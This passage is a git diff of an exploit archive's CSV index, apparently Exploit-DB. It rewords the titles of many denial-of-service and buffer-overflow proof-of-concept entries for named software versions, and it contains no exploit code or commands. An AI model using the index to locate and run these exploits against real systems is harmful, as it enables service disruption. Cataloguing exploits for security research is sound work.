diff --git a/files.csv b/files.csv index d9a526c9d..f4faa7e78 100644 --- a/files.csv +++ b/files.csv @@ -40,7 +40,7 @@ id,file,description,date,author,platform,type,port 262,platforms/hardware/dos/262.pl,"Cisco (Multiple Products) - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 -276,platforms/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit",2004-04-22,Aphex,windows,dos,0 +276,platforms/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset",2004-04-22,Aphex,windows,dos,0 298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0 @@ -259,7 +259,7 @@ id,file,description,date,author,platform,type,port 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 -1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflows (PoC)",2005-12-02,Sowhat,windows,dos,0 +1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Unauthenticated Multiple Remote Stack Overflows (PoC)",2005-12-02,Sowhat,windows,dos,0 1362,platforms/windows/dos/1362.html,"Mozilla Firefox 1.5 - 'history.dat' Looping (PoC)",2005-12-07,ZIPLOCK,windows,dos,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 @@ -329,7 +329,7 @@ id,file,description,date,author,platform,type,port 1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 -1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0 +1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - 'USER' Unauthenticated Remote Denial of Service",2006-05-05,Bigeazer,windows,dos,0 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - 'USER' Remote Denial of Service",2006-05-06,Omni,windows,dos,0 1758,platforms/windows/dos/1758.pl,"TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service",2006-05-06,[Oo],windows,dos,0 1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - CSS Attribute Denial of Service",2006-05-10,seven,windows,dos,0 @@ -624,7 +624,7 @@ id,file,description,date,author,platform,type,port 4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4293,platforms/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,win_x86,dos,0 -4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 +4294,platforms/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0 @@ -641,7 +641,7 @@ id,file,description,date,author,platform,type,port 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0 4409,platforms/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0 -4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 +4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",multiple,dos,0 4474,platforms/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,windows,dos,0 4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,windows,dos,0 @@ -666,7 +666,7 @@ id,file,description,date,author,platform,type,port 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 -4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 +4717,platforms/windows/dos/4717.py,"Simple HTTPd 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0 @@ -705,7 +705,7 @@ id,file,description,date,author,platform,type,port 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0 5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service",2008-03-11,ryujin,windows,dos,0 +5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service",2008-03-11,ryujin,windows,dos,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 @@ -754,7 +754,7 @@ id,file,description,date,author,platform,type,port 6077,platforms/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server - Denial of Service",2008-07-15,Shinnok,windows,dos,0 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow (PoC)",2008-07-15,r0ut3r,windows,dos,0 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 -6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 +6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Unauthenticated Remote Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,minix,dos,0 6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,minix,dos,0 @@ -879,7 +879,7 @@ id,file,description,date,author,platform,type,port 7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - HTML Tag Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 -7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 +7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 Wireless ADSL Router - HTTPd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (Windows / Linux) - Remote Denial of Service",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 @@ -910,7 +910,7 @@ id,file,description,date,author,platform,type,port 7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities",2009-01-12,securfrog,windows,dos,0 7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0 -7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0 +7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0 7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0 7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos,0 7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 @@ -1222,7 +1222,7 @@ id,file,description,date,author,platform,type,port 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 -9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 +9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144 @@ -1248,7 +1248,7 @@ id,file,description,date,author,platform,type,port 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 10102,platforms/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)",2009-11-16,"Jeremy Brown",win_x86,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 -10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21 +10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,windows,dos,21 10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 10163,platforms/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 @@ -1374,7 +1374,7 @@ id,file,description,date,author,platform,type,port 11332,platforms/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution Denial of Service",2010-02-05,cr4wl3r,windows,dos,0 11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - 'wav' memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,windows,dos,0 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos,0 -11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0 +11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Unauthenticated Remote Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0 11347,platforms/windows/dos/11347.html,"Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow (PoC)",2010-02-09,"fl0 fl0w",windows,dos,0 @@ -1432,7 +1432,7 @@ id,file,description,date,author,platform,type,port 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,windows,dos,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,windows,dos,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 -11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service Vulnerabilities (PoC)",2010-03-14,loneferret,windows,dos,0 +11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Unauthenticated Remote Denial of Service Multiple Vulnerabilities (PoC)",2010-03-14,loneferret,windows,dos,0 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 11763,platforms/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,multiple,dos,0 11769,platforms/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",hardware,dos,0 @@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port 11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,windows,dos,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crashs (SEH) (PoC)",2010-03-19,loneferret,windows,dos,21 +11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Crashs (SEH) (PoC)",2010-03-19,loneferret,windows,dos,21 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 @@ -1548,7 +1548,7 @@ id,file,description,date,author,platform,type,port 12588,platforms/linux/dos/12588.txt,"Samba 3.4.7/3.5.1 - Denial of Service",2010-05-13,"laurent gaffie",linux,dos,0 12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 -12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0 +12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)",2010-05-18,JMIT,netbsd_x86,dos,0 @@ -1559,7 +1559,7 @@ id,file,description,date,author,platform,type,port 28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - '.wav' Crash (PoC)",2013-09-03,ariarat,windows,dos,0 12683,platforms/windows/dos/12683.pl,"SolarWinds TFTP Server 10.4.0.10 - Denial of Service",2010-05-21,Nullthreat,windows,dos,69 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 -12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0 +12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0 12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos,0 12740,platforms/windows/dos/12740.py,"Webby WebServer - SEH Control (PoC)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 @@ -1579,7 +1579,7 @@ id,file,description,date,author,platform,type,port 40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (1)",2016-07-13,COSIG,multiple,dos,0 18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service",2012-03-17,"brock haun",windows,dos,0 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 -13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80 +13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPd - Remote Exploit (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80 13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - Mobile Office Suite '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 @@ -1634,7 +1634,7 @@ id,file,description,date,author,platform,type,port 14380,platforms/windows/dos/14380.py,"Power/Personal FTP Server - RETR Denial of Service",2010-07-16,antrhacks,windows,dos,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta - Denial of Service (PoC)",2010-07-18,loneferret,windows,dos,0 14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Microsoft Clip Organizer Multiple Insecure ActiveX Control Denial of Service Vulnerabilities",2010-07-20,"Beenu Arora",windows,dos,0 -14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 +14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos,0 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 @@ -1853,7 +1853,7 @@ id,file,description,date,author,platform,type,port 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0 15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 -15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)",2010-12-29,emgent,windows,dos,0 +15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)",2010-12-29,emgent,windows,dos,0 15894,platforms/windows/dos/15894.c,"Microsoft Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player - Local Crash (PoC)",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 @@ -1866,7 +1866,7 @@ id,file,description,date,author,platform,type,port 15973,platforms/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument - Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service",2011-01-13,"Craig Freyman",windows,dos,0 -15988,platforms/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0 +15988,platforms/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication",2011-01-14,"Jeremy Brown",windows,dos,0 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service",2011-01-16,MJ0011,windows,dos,0 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 @@ -1943,7 +1943,7 @@ id,file,description,date,author,platform,type,port 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 -17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 +17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated Kernel Memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 @@ -2016,7 +2016,7 @@ id,file,description,date,author,platform,type,port 17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service 'TOWeb.MO' File Corruption",2011-09-05,"BSOD Digital",windows,dos,0 -17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 +17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0 @@ -2128,7 +2128,7 @@ id,file,description,date,author,platform,type,port 18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - 'officeviewermme.ocx' Buffer Overflow (PoC)",2012-01-31,LiquidWorm,windows,dos,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod 